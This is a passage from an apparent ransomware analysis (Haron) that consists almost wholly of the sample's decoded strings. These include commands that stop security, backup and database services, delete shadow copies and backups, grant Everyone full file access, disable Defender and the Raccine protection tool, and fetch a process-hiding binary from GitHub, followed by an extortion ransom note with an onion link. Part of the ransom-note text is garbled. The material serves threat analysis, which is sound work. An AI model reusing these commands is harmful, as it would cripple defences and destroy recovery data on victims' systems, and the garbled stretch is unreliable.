29\n\nc3RvcCBWZWVhbURlcGxveVN2YyAveQ==\r\nc3RvcCBNU1NRTFNFUlZFUiAveQ==\r\nc3RvcCBNQkVuZHBvaW50QWdlbnQgL3k=\r\nc3RvcCBWZWVhbUVudGVycHJpc2VNYW5hZ2VyU3ZjIC95\r\nc3RvcCBNU1NRTFNlcnZlckFESGVscGVyIC95\r\nc3RvcCBNY0FmZWVFbmdpbmVTZXJ2aWNlIC95\r\nc3RvcCBWZWVhbUh2SW50ZWdyYXRpb25TdmMgL3k=\r\nc3RvcCBNU1NRTFNlcnZlckFESGVscGVyMTAwIC95\r\nc3RvcCBNY0FmZWVGcmFtZXdvcmsgL3k=\r\nc3RvcCBWZWVhbU1vdW50U3ZjIC95\r\nc3RvcCBNU1NRTFNlcnZlck9MQVBTZXJ2aWNlIC95\r\nc3RvcCBNY0FmZWVGcmFtZXdvcmtNY0FmZWVGcmFtZXdvcmsgL3k=\r\nc3RvcCBNeVNRTDU3IC95\r\nc3RvcCBNY1NoaWVsZCAveQ==\r\nc3RvcCBWZWVhbVJFU1RTdmMgL3k=\r\nc3RvcCBNeVNRTDgwIC95\r\nc3RvcCBNY1Rhc2tNYW5hZ2VyIC95\r\nc3RvcCBPcmFjbGVDbGllbnRDYWNoZTgwIC95\r\nc3RvcCBtZmVmaXJlIC95\r\nc3RvcCB3YmVuZ2luZSAveQ==\r\nc3RvcCBtZmVtbXMgL3k=\r\nc3RvcCBSRVN2YyAveQ==\r\nc3RvcCBtZmV2dHAgL3k=\r\nc3RvcCBzbXNfc2l0ZV9zcWxfYmFja3VwIC95\r\nc3RvcCBTUUxBZ2VudCRCS1VQRVhFQyAveQ==\r\nc3RvcCBNU1NRTCRTT1BIT1MgL3k=\r\nc3RvcCBTUUxBZ2VudCRDSVRSSVhfTUVUQUZSQU1FIC95\r\nc3RvcCBzYWNzdnIgL3k=\r\nc3RvcCBTUUxBZ2VudCRDWERCIC95\r\nc3RvcCBTQVZBZG1pblNlcnZpY2UgL3k=\r\nc3RvcCBTUUxBZ2VudCRFQ1dEQjIgL3k=\r\nc3RvcCBTQVZTZXJ2aWNlIC95\r\nc3RvcCBTUUxBZ2VudCRQUkFDVFRJQ0VCR0MgL3k=\r\nc3RvcCBTZXBNYXN0ZXJTZXJ2aWNlIC95\r\nc3RvcCBTUUxBZ2VudCRQUkFDVFRJQ0VNR1QgL3k=\r\nc3RvcCBTaE1vbml0b3IgL3k=\r\nc3RvcCBTUUxBZ2VudCRQUk9EIC95\r\nc3RvcCBTbWNpbnN0IC95\r\nc3RvcCBTUUxBZ2VudCRQUk9GWEVOR0FHRU1FTlQgL3k=\r\nc3RvcCBTbWNTZXJ2aWNlIC95\r\nc3RvcCBTUUxBZ2VudCRTQlNNT05JVE9SSU5HIC95\r\nc3RvcCBTbnRwU2VydmljZSAveQ==\r\nc3RvcCBTUUxBZ2VudCRTSEFSRVBPSU5UIC95\r\nc3RvcCBzb3Bob3NzcHMgL3k=\r\nc3RvcCBTUUxBZ2VudCRTUUxfMjAwOCAveQ==\r\nc3RvcCBTUUxBZ2VudCRTT1BIT1MgL3k=\r\nc3RvcCBTUUxBZ2VudCRTUUxFWFBSRVNTIC95\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 15 of 29\n\nc3RvcCBzdmNHZW5lcmljSG9zdCAveQ==\r\nc3RvcCBTUUxBZ2VudCRTWVNURU1fQkdDIC95\r\nc3RvcCBzd2lfZmlsdGVyIC95\r\nc3RvcCBTUUxBZ2VudCRUUFMgL3k=\r\nc3RvcCBzd2lfc2VydmljZSAveQ==\r\nc3RvcCBTUUxBZ2VudCRUUFNBTUEgL3k=\r\nc3RvcCBzd2lfdXBkYXRlIC95\r\nc3RvcCBzd2lfdXBkYXRlXzY0IC95\r\nc3RvcCBTUUxBZ2VudCRWRUVBTVNRTDIwMTIgL3k=\r\nc3RvcCBUbUNDU0YgL3k=\r\nc3RvcCBTUUxCcm93c2VyIC95\r\nc3RvcCB0bWxpc3RlbiAveQ==\r\nc3RvcCBTUUxTYWZlT0xSU2VydmljZSAveQ==\r\nc3RvcCBUcnVlS2V5IC95\r\nc3RvcCBTUUxTRVJWRVJBR0VOVCAveQ==\r\nc3RvcCBUcnVlS2V5U2NoZWR1bGVyIC95\r\nc3RvcCBTUUxURUxFTUVUUlkgL3k=\r\nc3RvcCBUcnVlS2V5U2VydmljZUhlbHBlciAveQ==\r\nc3RvcCBTUUxURUxFTUVUUlkkRUNXREIyIC95\r\nc3RvcCBXUlNWQyAveQ==\r\nc3RvcCBtc3NxbCR2aW1fc3FsZXhwIC95\r\nc3RvcCB2YXBpZW5kcG9pbnQgL3k=\r\nY29uZmlnIERuc2NhY2hlIHN0YXJ0PSBhdXRv\r\nY29uZmlnIEZEUmVzUHViIHN0YXJ0PSBhdXRv\r\nY29uZmlnIFNTRFBTUlYgc3RhcnQ9IGF1dG8=\r\nY29uZmlnIHVwbnBob3N0IHN0YXJ0PSBhdXRv\r\nY29uZmlnIFNRTFRFTEVNRVRSWSBzdGFydD0gZGlzYWJsZWQ=\r\nY29uZmlnIFNRTFRFTEVNRVRSWSRFQ1dEQjIgc3RhcnQ9IGRpc2FibGVk\r\nY29uZmlnIFNRTFdyaXRlciBzdGFydD0gZGlzYWJsZWQ=\r\nY29uZmlnIFNzdHBTdmMgc3RhcnQ9IGRpc2FibGVk\r\nL0lNIG1zcHViLmV4ZSAvRg==\r\nL0lNIG15ZGVza3RvcHFvcy5leGUgL0Y=\r\nL0lNIG15ZGVza3RvcHNlcnZpY2UuZXhlIC9G\r\nL0lNIG15c3FsZC5leGUgL0Y=\r\nL0lNIHNxYmNvcmVzZXJ2aWNlLmV4ZSAvRg==\r\nL0lNIGZpcmVmb3hjb25maWcuZXhlIC9G\r\nL0lNIGFnbnRzdmMuZXhlIC9G\r\nL0lNIHRoZWJhdC5leGUgL0Y=\r\nL0lNIHN0ZWFtLmV4ZSAvRg==\r\nL0lNIGVuY3N2Yy5leGUgL0Y=\r\nL0lNIGV4Y2VsLmV4ZSAvRg==\r\nL0lNIENOVEFvU01nci5leGUgL0Y=\r\nL0lNIHNxbHdyaXRlci5leGUgL0Y=\r\nL0lNIHRiaXJkY29uZmlnLmV4ZSAvRg==\r\nL0lNIGRiZW5nNTAuZXhlIC9G\r\nL0lNIHRoZWJhdDY0LmV4ZSAvRg==\r\nL0lNIG9jb21tLmV4ZSAvRg==\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 16 of 29\n\nL0lNIGluZm9wYXRoLmV4ZSAvRg==\r\nL0lNIG1iYW10cmF5LmV4ZSAvRg==\r\nL0lNIHpvb2x6LmV4ZSAvRg==\r\nSU0gdGh1bmRlcmJpcmQuZXhlIC9G\r\nL0lNIGRic25tcC5leGUgL0Y=\r\nL0lNIHhmc3N2Y2Nvbi5leGUgL0Y=\r\nL0lNIE50cnRzY2FuLmV4ZSAvRg==\r\nL0lNIGlzcWxwbHVzc3ZjLmV4ZSAvRg==\r\nL0lNIG9uZW5vdGUuZXhlIC9G\r\nL0lNIFBjY05UTW9uLmV4ZSAvRg==\r\nL0lNIG1zYWNjZXNzLmV4ZSAvRg==\r\nL0lNIG91dGxvb2suZXhlIC9G\r\nL0lNIHRtbGlzdGVuLmV4ZSAvRg==\r\nL0lNIG1zZnRlc3FsLmV4ZSAvRg==\r\nL0lNIHBvd2VycG50LmV4ZSAvRg==\r\nL0lNIHZpc2lvLmV4ZSAvRg==\r\nL0lNIHdpbndvcmQuZXhlIC9G\r\nL0lNIG15c3FsZC1udC5leGUgL0Y=\r\nL0lNIHdvcmRwYWQuZXhlIC9G\r\nL0lNIG15c3FsZC1vcHQuZXhlIC9G\r\nL0lNIG9jYXV0b3VwZHMuZXhlIC9G\r\nL0lNIG9jc3NkLmV4ZSAvRg==\r\nL0lNIG9yYWNsZS5leGUgL0Y=\r\nL0lNIHNxbGFnZW50LmV4ZSAvRg==\r\nL0lNIHNxbGJyb3dzZXIuZXhlIC9G\r\nL0lNIHNxbHNlcnZyLmV4ZSAvRg==\r\nL0lNIHN5bmN0aW1lLmV4ZSAvRg==\r\n=QXZpVXcvACbsF2LgM3dvRWYoNFIlRXZsVGR\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1jOiAvb249YzogL21heHNpemU9NDAxTUI=\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1jOiAvb249YzogL21heHNpemU9dW5ib3VuZGVk\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1kOiAvb249ZDogL21heHNpemU9NDAxTUI=\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1kOiAvb249ZDogL21heHNpemU9dW5ib3VuZGVk\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1lOiAvb249ZTogL21heHNpemU9NDAxTUI=\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1lOiAvb249ZTogL21heHNpemU9dW5ib3VuZGVk\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1mOiAvb249ZjogL21heHNpemU9NDAxTUI=\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1mOiAvb249ZjogL21heHNpemU9dW5ib3VuZGVk\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1nOiAvb249ZzogL21heHNpemU9NDAxTUI=\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1nOiAvb249ZzogL21heHNpemU9dW5ib3VuZGVk\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1oOiAvb249aDogL21heHNpemU9NDAxTUI=\r\ncmVzaXplIHNoYWRvd3N0b3JhZ2UgL2Zvcj1oOiAvb249aDogL21heHNpemU9dW5ib3VuZGVk\r\nR2V0LVdtaU9iamVjdCBXaW4zMl9TaGFkb3djb3B5IHwgRm9yRWFjaC1PYmplY3QgeyAkX0RlbGV0ZSgpOyB9\r\nL3MgL2YgL3EgYzpcKi5WSEQgYzpcKi5iYWMgYzpcKi5iYWsgYzpcKi53YmNhdCBjOlwqLmJrZiBjOlxCYWNrdXAqLiogYzpcYmFja\r\nL3MgL2YgL3EgZDpcKi5WSEQgZDpcKi5iYWMgZDpcKi5iYWsgZDpcKi53YmNhdCBkOlwqLmJrZiBkOlxCYWNrdXAqLiogZDpcYmFja\r\nL3MgL2YgL3EgZTpcKi5WSEQgZTpcKi5iYWMgZTpcKi5iYWsgZTpcKi53YmNhdCBlOlwqLmJrZiBlOlxCYWNrdXAqLiogZTpcYmFja\r\nL3MgL2YgL3EgZjpcKi5WSEQgZjpcKi5iYWMgZjpcKi5iYWsgZjpcKi53YmNhdCBmOlwqLmJrZiBmOlxCYWNrdXAqLiogZjpcYmFja\r\nL3MgL2YgL3EgZzpcKi5WSEQgZzpcKi5iYWMgZzpcKi5iYWsgZzpcKi53YmNhdCBnOlwqLmJrZiBnOlxCYWNrdXAqLiogZzpcYmFja\r\nL3MgL2YgL3EgaDpcKi5WSEQgaDpcKi5iYWMgaDpcKi5iYWsgaDpcKi53YmNhdCBoOlwqLmJrZiBoOlxCYWNrdXAqLiogaDpcYmFja\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 17 of 29\n\nIkM6KiIgL2dyYW50IEV2ZXJ5b25lOkYgL1QgL0MgL1E=\r\nIkQ6KiIgL2dyYW50IEV2ZXJ5b25lOkYgL1QgL0MgL1E=\r\nIlo6KiIgL2dyYW50IEV2ZXJ5b25lOkYgL1QgL0MgL1E=\r\n1\r\nLOGONISOFF\r\nreload1.lnk\r\nVGhhbm9z\r\nDebug_Log.txt\r\nUserName=\r\n_MachineName=\r\n_\r\n.txt\r\n.[ID-\r\n]\r\n\"db\",\"dbf\",\"accdb\",\"dbx\",\"mdb\",\"mdf\",\"epf\",\"ndf\",\"ldf\",\"1cd\",\"sdf\",\"nsf\",\"fp7\",\"cat\",\"log\"\r\n*.*\r\nprogram files\r\nwindows\r\nprogramdata\r\n$\r\nSetting write access permission:\r\n - File Size:\r\n bytes\r\n----------------------------------------------------------------------------\r\naWNhY2xzLmV4ZQ==\r\nIC9ncmFudCA=\r\nOkYgL1QgL0MgL1E=\r\n - Error while checking for user write access permission:\r\n - Error while reading if filesize is zero:\r\n - Error while renaming to crypted extension:\r\ndGFza2xpc3Q=\r\nL3YgL2ZvIGNzdg==\r\nL2YgL3BpZCA=\r\nUTF-8\u003c------------\u003exp\r\nSelect * from Win32_ComputerSystem\r\nManufacturer\r\nmicrosoft corporation\r\nModel\r\nVIRTUAL\r\nvmware\r\nVirtualBox\r\nSbieDll.dll\r\nwallpaper.bmp\r\nU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUG9saWNpZXNcU3lzdGVt\r\nRGlzYWJsZVRhc2tNZ3I=\r\nwin32_processor\r\nprocessorID\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 18 of 29\n\nC\r\nwin32_logicaldisk.deviceid=\"\r\n:\"\r\nVolumeSerialNumber\r\nSTOR\r\nGlobal\\\r\nData are empty\r\ndata\r\nMaximum data length is {0}\r\nKey size is not valid\r\nkeySize\r\nKey is null or empty\r\npublicKeyXml\r\n!\r\nNDA5NiE8UlNBS2V5VmFsdWU+PE1vZHVsdXM+aWIvYm0yWU1HOEFnd2xXSVdTYjhZbE1hUVN3TlVqaUd6SUMxNEpMYm8rV3JkaVIzU\r\nIPInfo: Error Parsing 'arp -a' results\r\narp\r\n-a\r\nIPInfo: Error Retrieving 'arp -a' Results\r\nvalue\r\nrgbKey\r\nInvalid key size; it must be 128 or 256 bits.\r\nrgbIV\r\nInvalid IV size; it must be 8 bytes.\r\ninputBuffer\r\ninputOffset\r\ninputCount\r\noutputBuffer\r\noutputOffset\r\nexpand 32-byte k\r\nexpand 16-byte k\r\n - Error while reading from file:\r\nLQ==\r\nKw==\r\n - Error while partial writing to file:\r\naHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlN\r\naHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2QzNWhhL1Byb2Nlc3NIaWRlL21hc3Rlci9iaW5zL1Byb2Nlc3NIaWRlM\r\n.\r\n.exe\r\n *32\r\nY29uaG9zdC5leGU=\r\nbmV0MS5leGU=\r\nQVJQLkVYRQ==\r\nY21kLmV4ZQ==\r\nTaskManagerWindow\r\nAdministrador de tareas\r\n#32770\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 19 of 29\n\nTask Manager\r\nSysListView32\r\nProcesses\r\nProcesos\r\nkernel32.dll\r\nGetProcessId\r\nGetCurrentProcessId\r\nntdll.dll\r\nNtReadVirtualMemory\r\nNtOpenProcess\r\nNtQuerySystemInformation\r\nQ3JlYXRlU2hvcnRjdXQ=\r\nError while creating ShortCut:\r\nV1NjcmlwdC5TaGVsbA==\r\naHR0cCBhbmFseXplciBzdGFuZC1hbG9uZQ==\r\nZmlkZGxlcg==\r\nZWZmZXRlY2ggaHR0cCBzbmlmZmVy\r\nZmlyZXNoZWVw\r\nSUVXYXRjaCBQcm9mZXNzaW9uYWw=\r\nZHVtcGNhcA==\r\nd2lyZXNoYXJr\r\nd2lyZXNoYXJrIHBvcnRhYmxl\r\nc3lzaW50ZXJuYWxzIHRjcHZpZXc=\r\nTmV0d29ya01pbmVy\r\nTmV0d29ya1RyYWZmaWNWaWV3\r\nSFRUUE5ldHdvcmtTbmlmZmVy\r\ndGNwZHVtcA==\r\naW50ZXJjZXB0ZXI=\r\nSW50ZXJjZXB0ZXItTkc=\r\nb2xseWRiZw==\r\neDY0ZGJn\r\neDMyZGJn\r\nZG5zcHk=\r\nZG5zcHkteDg2\r\nZGU0ZG90\r\naWxzcHk=\r\nZG90cGVlaw==\r\nZG90cGVlazY0\r\naWRhNjQ=\r\nUkRHIFBhY2tlciBEZXRlY3Rvcg==\r\nQ0ZGIEV4cGxvcmVy\r\nUEVpRA==\r\ncHJvdGVjdGlvbl9pZA==\r\nTG9yZFBF\r\ncGUtc2lldmU=\r\nTWVnYUR1bXBlcg==\r\nVW5Db25mdXNlckV4\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 20 of 29\n\nVW5pdmVyc2FsX0ZpeGVy\r\nTm9GdXNlckV4\r\nQmxvY2tz\r\n - Error creating filestream for block process or read-write:\r\nchrome\r\nopera\r\nmsedge\r\niexplore\r\nfirefox\r\nexplorer\r\nwininit\r\nwinlogon\r\nSearchApp\r\nSearchIndexer\r\nSearchUI\r\n:Zone.Identifier\r\nDrive Mounted: {0}\r\nError while mounting network drives:\r\nERROR=\r\nADMIN$\r\nprint$\r\nUser\r\n:\\\r\nShare Added: {0}\r\nError while enumerating shares:\r\n2:\r\nTaskmgr\r\ntaskmgr\r\nProcessHacker\r\nprocexp\r\nprocexp64\r\nSet-MpPreference -EnableControlledFolderAccess Disabled\r\n/c rd /s /q %SYSTEMDRIVE%\\\\$Recycle.bin\r\nClient IP:\r\nhttp://icanhazip.comDate of encryption:\r\nClient Unique Identifier Key:\r\n-------=== Your network has been infected! ===-------***DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA H\r\nYou are not able to decrypt it by yourself. But don't worry, we can help you to restore all your file\r\nThe only way to restore your files is to buy our special software. Only we can give you this software\r\nIf you do not contact as in a 3 days we will post information about your breach on our public news we\r\nYou can get more information on our page, which is located in a Tor hidden network.How to get to our\r\n--------------------------------------------------------------------------------\r\n1.Download Tor browser - https://www.torproject.org/2.Install Tor browser3.Open link in Tor browser -\r\n* DO NOT MODIFY ENCRYPTED FILES!\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 21 of 29\n\n* * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * *Key Identifier:\nNumber of files that were processed is:\nPC Hardware ID:\n\n**-----**\n\n*****DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAV**\n\n**We have also downloaded a lot of private data from your network.  \nIf you do not contact as in**\n\n**2.Install Tor browser**\n\n**3.Open link in Tor browser -[Chaddadgroup passwo](\u003chttp://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnp\n\u003cp\u003e4.Use login:\u003cspan style=\u003e)\n\n[5.Follow the instructions on this page](\u003chttp://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnp\n\u003cp\u003e4.Use login:\u003cspan style=\u003e)\n\n[* DO NOT TRY TO RECOVER FILES YOURSELF!* \u003c Key Identifier: Q!4Possible affected files: notepad.exe mshta.exe Q This program requires Microsoft .NET Framework v. 4.82 or superior to run properly Information... Builder_Log LocalAccountTokenFilterPolicy EnableLinkedConnections powershell.exeSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options vssadmin.exe wmic.exe wbadmin.exe bcdedit.exe diskshadow.exe net.exe Raccine SOFTWARE taskkill /F /IM RaccineSettings.exe reg delete \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Raccine Tray\" /F delete HKCU\\Software\\Raccine /F schtasks /DELETE /TN \"Raccine Rules Updater\" /F GotAllDone SYSTEM\\CurrentControlSet\\Control\\FileSystem LongPathsEnabled netsh advfirewall firewall set rule group=\\\"Network Discovery\\\" new enable=Yes advfirewall firewall set rule group=\\\"File and Printer Sharing\\\" new enable=Yes /C ping 127.0.0.7 -n 3 \u003e Nul \u0026 fsutil file setZeroData offset=0 length=524288 “%s” \u0026 Del /f /q “%s” /C choice /C Y /N /D Y /T 3 \u0026 Del https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b Page 22 of 29](\u003chttp://ft4zr2jzlqoyob7yg4fcpwyt37hox3ajajqnfkdvbfrkjioyunmqnp\n\u003cp\u003e4.Use login:\u003cspan style=\u003e)**\n\nsc.exe\r\ntaskkill.exe\r\ndel.exe\r\nlsass.exe\r\nsvchst.exe\r\ncrcss.exe\r\nchrome32.exe\r\nfirefox.exe\r\ncalc.exe\r\nmysqld.exe\r\ndllhst.exe\r\nopera32.exe\r\nmemop.exe\r\nspoolcv.exe\r\nctfmom.exe\r\nSkypeApp.exe\r\nstart Dnscache /y\r\nstart FDResPub /y\r\nstart SSDPSRV /y\r\nstart upnphost /y\r\nstop avpsus /y\r\nstop McAfeeDLPAgentService /y\r\nstop mfewc /y\r\nstop BMR Boot Service /y\r\nstop NetBackup BMR MTFTP Service /y\r\nstop DefWatch /y\r\nstop ccEvtMgr /y\r\nstop ccSetMgr /y\r\nstop SavRoam /y\r\nstop RTVscan /y\r\nstop QBFCService /y\r\nstop QBIDPService /y\r\nstop Intuit.QuickBooks.FCS /y\r\nstop QBCFMonitorService /y\r\nstop YooBackup /y\r\nstop YooIT /y\r\nstop zhudongfangyu /y\r\nstop stc_raw_agent /y\r\nstop VSNAPVSS /y\r\nstop VeeamTransportSvc /y\r\nstop VeeamDeploymentService /y\r\nstop VeeamNFSSvc /y\r\nstop veeam /y\r\nstop PDVFSService /y\r\nstop BackupExecVSSProvider /y\r\nstop BackupExecAgentAccelerator /y\r\nstop BackupExecAgentBrowser /y\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 23 of 29\n\nstop BackupExecDiveciMediaService /y\r\nstop BackupExecJobEngine /y\r\nstop BackupExecManagementService /y\r\nstop BackupExecRPCService /y\r\nstop AcrSch2Svc /y\r\nstop AcronisAgent /y\r\nstop CASAD2DWebSvc /y\r\nstop CAARCUpdateSvc /y\r\nstop sophos /y\r\nstop “Acronis VSS Provider” /y\r\nstop MsDtsServer /y\r\nstop IISAdmin /y\r\nstop MSExchangeES /y\r\nstop “Sophos Agent” /y\r\nstop EraserSvc11710 /y\r\nstop “Enterprise Client Service” /y\r\nstop “SQL Backups /y\r\nstop MsDtsServer100 /y\r\nstop NetMsmqActivator /y\r\nstop MSExchangeIS /y\r\nstop “Sophos AutoUpdate Service” /y\r\nstop SamSs /y\r\nstop ReportServer /y\r\nstop “SQLsafe Backup Service” /y\r\nstop MsDtsServer110 /y\r\nstop POP3Svc /y\r\nstop MSExchangeMGMT /y\r\nstop “Sophos Clean Service” /y\r\nstop SMTPSvc /y\r\nstop ReportServer$SQL_2008 /y\r\nstop “SQLsafe Filter Service” /y\r\nstop msftesql$PROD /y\r\nstop SstpSvc /y\r\nstop MSExchangeMTA /y\r\nstop “Sophos Device Control Service” /y\r\nstop ReportServer$SYSTEM_BGC /y\r\nstop “Symantec System Recovery” /y\r\nstop MSOLAP$SQL_2008 /y\r\nstop UI0Detect /y\r\nstop MSExchangeSA /y\r\nstop “Sophos File Scanner Service” /y\r\nstop ReportServer$TPS /y\r\nstop “Veeam Backup Catalog Data Service” /y\r\nstop MSOLAP$SYSTEM_BGC /y\r\nstop W3Svc /y\r\nstop MSExchangeSRS /y\r\nstop “Sophos Health Service” /y\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 24 of 29\n\nstop ReportServer$TPSAMA /y\r\nstop “Zoolz 2 Service” /y\r\nstop MSOLAP$TPS /y\r\nstop “aphidmonitorservice” /y\r\nstop msexchangeadtopology /y\r\nstop “Sophos MCS Agent” /y\r\nstop MSOLAP$TPSAMA /y\r\nstop “intel(r) proset monitoring service” /y\r\nstop msexchangeimap4 /y\r\nstop “Sophos MCS Client” /y\r\nstop ARSM /y\r\nstop MSSQL$BKUPEXEC /y\r\nstop unistoresvc_1af40a /y\r\nstop “Sophos Message Router” /y\r\nstop MSSQL$ECWDB2 /y\r\nstop audioendpointbuilder /y\r\nstop “Sophos Safestore Service” /y\r\nstop MSSQL$PRACTICEMGT /y\r\nstop “Sophos System Protection Service” /y\r\nstop BackupExecDeviceMediaService /y\r\nstop MSSQL$PRACTTICEBGC /y\r\nstop “Sophos Web Control Service” /y\r\nstop MSSQL$PROD /y\r\nstop MSSQL$PROFXENGAGEMENT /y\r\nstop Antivirus /y\r\nstop MSSQL$SBSMONITORING /\r\nstop MSSQL$SBSMONITORING /y\r\nstop AVP /y\r\nstop MSSQL$SHAREPOINT /y\r\nstop DCAgent /y\r\nstop bedbg /y\r\nstop MSSQL$SQL_2008 /y\r\nstop EhttpSrv /y\r\nstop MMS /y\r\nstop MSSQL$SQLEXPRESS /y\r\nstop ekrn /y\r\nstop mozyprobackup /y\r\nstop MSSQL$SYSTEM_BGC /y\r\nstop EPSecurityService /y\r\nstop MSSQL$VEEAMSQL2008R2 /y\r\nstop MSSQL$TPS /y\r\nstop EPUpdateService /y\r\nstop ntrtscan /y\r\nstop MSSQL$TPSAMA /y\r\nstop EsgShKernel /y\r\nstop ESHASRV /y\r\nstop SDRSVC /y\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 25 of 29\n\nstop MSSQL$VEEAMSQL2012 /y\r\nstop FA_Scheduler /y\r\nstop SQLAgent$VEEAMSQL2008R2 /y\r\nstop MSSQLFDLauncher$PROFXENGAGEMENT /y\r\nstop KAVFS /y\r\nstop SQLWriter /y\r\nstop MSSQLFDLauncher$SBSMONITORING /y\r\nstop KAVFSGT /y\r\nstop VeeamBackupSvc /y\r\nstop MSSQLFDLauncher$SHAREPOINT /y\r\nstop kavfsslp /y\r\nstop VeeamBrokerSvc /y\r\nstop MSSQLFDLauncher$SQL_2008 /y\r\nstop klnagent /y\r\nstop VeeamCatalogSvc /y\r\nstop MSSQLFDLauncher$SYSTEM_BGC /y\r\nstop macmnsvc /y\r\nstop VeeamCloudSvc /y\r\nstop MSSQLFDLauncher$TPS /y\r\nstop masvc /y\r\nstop MSSQLFDLauncher$TPSAMA /y\r\nstop MBAMService /y\r\nstop VeeamDeploySvc /y\r\nstop MSSQLSERVER /y\r\nstop MBEndpointAgent /y\r\nstop VeeamEnterpriseManagerSvc /y\r\nstop MSSQLServerADHelper /y\r\nstop McAfeeEngineService /y\r\nstop VeeamHvIntegrationSvc /y\r\nstop MSSQLServerADHelper100 /y\r\nstop McAfeeFramework /y\r\nstop VeeamMountSvc /y\r\nstop MSSQLServerOLAPService /y\r\nstop McAfeeFrameworkMcAfeeFramework /y\r\nstop MySQL57 /y\r\nstop McShield /y\r\nstop VeeamRESTSvc /y\r\nstop MySQL80 /y\r\nstop McTaskManager /y\r\nstop OracleClientCache80 /y\r\nstop mfefire /y\r\nstop wbengine /y\r\nstop mfemms /y\r\nstop RESvc /y\r\nstop mfevtp /y\r\nstop sms_site_sql_backup /y\r\nstop SQLAgent$BKUPEXEC /y\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 26 of 29\n\nstop MSSQL$SOPHOS /y\r\nstop SQLAgent$CITRIX_METAFRAME /y\r\nstop sacsvr /y\r\nstop SQLAgent$CXDB /y\r\nstop SAVAdminService /y\r\nstop SQLAgent$ECWDB2 /y\r\nstop SAVService /y\r\nstop SQLAgent$PRACTTICEBGC /y\r\nstop SepMasterService /y\r\nstop SQLAgent$PRACTTICEMGT /y\r\nstop ShMonitor /y\r\nstop SQLAgent$PROD /y\r\nstop Smcinst /y\r\nstop SQLAgent$PROFXENGAGEMENT /y\r\nstop SmcService /y\r\nstop SQLAgent$SBSMONITORING /y\r\nstop SntpService /y\r\nstop SQLAgent$SHAREPOINT /y\r\nstop sophossps /y\r\nstop SQLAgent$SQL_2008 /y\r\nstop SQLAgent$SOPHOS /y\r\nstop SQLAgent$SQLEXPRESS /y\r\nstop svcGenericHost /y\r\nstop SQLAgent$SYSTEM_BGC /y\r\nstop swi_filter /y\r\nstop SQLAgent$TPS /y\r\nstop swi_service /y\r\nstop SQLAgent$TPSAMA /y\r\nstop swi_update /y\r\nstop swi_update_64 /y\r\nstop SQLAgent$VEEAMSQL2012 /y\r\nstop TmCCSF /y\r\nstop SQLBrowser /y\r\nstop tmlisten /y\r\nstop SQLSafeOLRService /y\r\nstop TrueKey /y\r\nstop SQLSERVERAGENT /y\r\nstop TrueKeyScheduler /y\r\nstop SQLTELEMETRY /y\r\nstop TrueKeyServiceHelper /y\r\nstop SQLTELEMETRY$ECWDB2 /y\r\nstop WRSVC /y\r\nstop mssql$vim_sqlexp /y\r\nstop vapiendpoint /y\r\nconfig Dnscache start= auto\r\nconfig FDResPub start= auto\r\nconfig SSDPSRV start= auto\r\nhttps://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b\r\nPage 27 of 29\n\nconfig upnphost start= auto\r\nconfig SQLTELEMETRY start= disabled\r\nconfig SQLTELEMETRY$ECWDB2 start= disabled\r\nconfig SQLWriter start= disabled\r\nconfig SstpSvc start= disabled\r\n/IM mspub.exe /F\r\n/IM mydesktopqos.exe /F\r\n/IM mydesktopservice.exe /F\r\n/IM mysqld.exe /F\r\n/IM sqbcoreservice.exe /F\r\n/IM firefoxconfig.exe /F\r\n/IM agntsvc.exe /F\r\n/IM thebat.exe 